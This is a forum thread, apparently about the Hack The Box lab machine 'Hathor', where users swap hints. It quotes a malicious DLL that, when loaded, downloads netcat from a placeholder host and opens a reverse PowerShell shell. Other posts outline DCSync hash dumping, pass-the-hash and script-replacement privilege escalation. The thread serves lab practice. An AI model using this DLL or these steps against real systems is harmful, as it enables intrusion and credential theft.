Posts: 40 Threads: 0 Joined: N/A
April 30, 2022 at 9:33 AM

> (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.

You have no issue accessing the box? Which VPN access / server are you using? I'm encountering 503 Service Unavailable on port 80.

Posts: 30 Threads: 0 Joined: N/A
April 30, 2022 at 9:39 AM

> (April 29, 2022, 09:24 AM) jon01 Wrote:
> Here is the script for the DLL:
>
>     #include <windows.h>
>
>     BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
>     {
>         switch (ul_reason_for_call)
>         {
>         case DLL_PROCESS_ATTACH:
>             system("takeown /f C:\\share\\Bginfo64.exe");
>             system("icacls C:\\share\\Bginfo64.exe /grant Everyone:F /T");
>             system("curl x.x.x.x:x/nc64.exe -o c:\\share\\Bginfo64.exe");
>             system("C:\\share\\Bginfo64.exe x..x.x.x x -e powershell.exe");
>             break;
>         case DLL_THREAD_ATTACH:
>         case DLL_THREAD_DETACH:
>         case DLL_PROCESS_DETACH:
>             break;
>         }
>         return TRUE;
>     }
>
> I'm having an error when I curl. If anyone rooted this box, please share the NTLM hash of administrator.

https://synisl33t.com/2022/04/20/htb-hathor/

Posts: 42 Threads: 0 Joined: N/A
April 30, 2022 at 10:01 AM

> (April 30, 2022, 09:33 AM) yemacaw863 Wrote:
> > (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> > Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
>
> You have no issue accessing the box? Which VPN access / server are you using? I'm encountering 503 Service Unavailable on port 80.

There's an issue with the machine at the moment; they said it will be fixed by the dev team next week. In the meantime you can contact one of the mods to patch it.

Posts: 21 Threads: 0 Joined: N/A
April 30, 2022 at 10:08 AM

> (April 30, 2022, 09:33 AM) yemacaw863 Wrote:
> > (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> > Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
>
> You have no issue accessing the box? Which VPN access / server are you using? I'm encountering 503 Service Unavailable on port 80.

Known issue it appears, they'll prob fix it in a while.

Posts: 42 Threads: 0 Joined: N/A
April 30, 2022 at 10:49 AM

> (April 30, 2022, 09:39 AM) ___user___ Wrote:
> > (April 29, 2022, 09:24 AM) jon01 Wrote:
> > Here is the script for the DLL:
> >
> >     #include <windows.h>
> >
> >     BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
> >     {
> >         switch (ul_reason_for_call)
> >         {
> >         case DLL_PROCESS_ATTACH:
> >             system("takeown /f C:\\share\\Bginfo64.exe");
> >             system("icacls C:\\share\\Bginfo64.exe /grant Everyone:F /T");
> >             system("curl x.x.x.x:x/nc64.exe -o c:\\share\\Bginfo64.exe");
> >             system("C:\\share\\Bginfo64.exe x..x.x.x x -e powershell.exe");
> >             break;
> >         case DLL_THREAD_ATTACH:
> >         case DLL_THREAD_DETACH:
> >         case DLL_PROCESS_DETACH:
> >             break;
> >         }
> >         return TRUE;
> >     }
> >
> > I'm having an error when I curl. If anyone rooted this box, please share the NTLM hash of administrator.
>
> https://synisl33t.com/2022/04/20/htb-hathor/

Make sure you are running "curl.exe", not just "curl".

Posts: 213 Threads: 0 Joined: N/A
April 30, 2022 at 6:12 PM

> (April 30, 2022, 06:01 PM) jon01 Wrote:
> > (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> > Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
>
> There is run.vbs in C:\Get-bADpasswords. If you run the vbs as gina it runs the ps1 as another user, and running the run.vbs script will execute another ps1 file in this Get-bADpasswords dir: just replace that .ps1.

Can you explain why running run.vbs runs this other ps1 script? I see only this one eventcreate line in run.vbs.

Posts: 40 Threads: 0 Joined: N/A

> (April 30, 2022, 06:01 PM) jon01 Wrote:
> > (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> > Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
>
> There is run.vbs in C:\Get-bADpasswords. If you run the vbs as gina it runs the ps1 as another user, and running the run.vbs script will execute another ps1 file in this Get-bADpasswords dir: just replace that .ps1.

I'm stuck again after I got the bpassrunner shell :( This user can read & execute C:\script\login.cmd. Not sure what to do... Little nudge pls.. Thanks

Posts: 42 Threads: 0 Joined: N/A

> (May 1, 2022, 12:26 AM) yemacaw863 Wrote:
> > (April 30, 2022, 06:01 PM) jon01 Wrote:
> > > (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> > > Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
> >
> > There is run.vbs in C:\Get-bADpasswords. If you run the vbs as gina it runs the ps1 as another user, and running the run.vbs script will execute another ps1 file in this Get-bADpasswords dir: just replace that .ps1.
>
> I'm stuck again after I got the bpassrunner shell :( This user can read & execute C:\script\login.cmd. Not sure what to do... Little nudge pls.. Thanks

Got a shell as bpassrunner as well... Looks like that login.cmd file is actually just for the dll stuff... Unfortunately not quite sure where to move next, still looking around.

Posts: 21 Threads: 0 Joined: N/A

Get-bADpasswords.ps1 needs to remain digitally signed, as all ps1 files must be signed.

Posts: 42 Threads: 0 Joined: N/A

> (May 1, 2022, 09:07 AM) jon01 Wrote:
> > (May 1, 2022, 02:18 AM) qwerty173 Wrote:
> > > (May 1, 2022, 12:26 AM) yemacaw863 Wrote:
> > > > (April 30, 2022, 06:01 PM) jon01 Wrote:
> > > > > (April 30, 2022, 06:27 AM) qwerty173 Wrote:
> > > > > Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
> > > >
> > > > There is run.vbs in C:\Get-bADpasswords. If you run the vbs as gina it runs the ps1 as another user, and running the run.vbs script will execute another ps1 file in this Get-bADpasswords dir: just replace that .ps1.
> > >
> > > I'm stuck again after I got the bpassrunner shell :( This user can read & execute C:\script\login.cmd. Not sure what to do... Little nudge pls.. Thanks
> >
> > Got a shell as bpassrunner as well... Looks like that login.cmd file is actually just for the dll stuff... Unfortunately not quite sure where to move next, still looking around.
>
> Go for a DCSync attack, u will get the admin hash.

I dumped the admin account using Get-ADReplAccount but I'm not sure what to do with the hashes; the NTLM one can't be cracked and doesn't let me perform PtH... I feel like Kerberos is the way forward but I'm not sure how to use it with evil-winrm etc.